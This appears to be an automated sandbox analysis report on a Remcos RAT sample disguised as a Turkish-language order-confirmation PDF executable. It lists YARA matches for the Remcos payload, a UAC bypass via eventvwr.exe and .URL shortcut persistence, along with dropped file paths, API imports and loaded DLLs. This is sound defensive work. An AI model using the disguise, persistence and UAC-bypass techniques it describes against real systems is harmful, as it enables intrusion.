                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: C:\Users\Public\Libraries\wflizeiulE.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Users\Public\Libraries\wflizeiulE.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait3_2_0040D2A6
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1054F910 atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_1054F910
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E9B050_3_036E9B05
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E1A140_3_036E1A14
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E19E80_3_036E19E8
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_038D3D3F0_3_038D3D3F
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040D2A63_2_0040D2A6
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_105410063_2_10541006
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 00413E72 appears 49 times
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 0041203B appears 31 times
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 10555801 appears 49 times
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_105555CE NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,3_2_105555CE
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310969892.00000000022EA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Eluiezilfw.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: Eluiezilfw.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: system.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: archiveint.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: ?????????.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: system.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: archiveint.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ??????.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: system.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: archiveint.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: ??????.dllJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeFile read: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
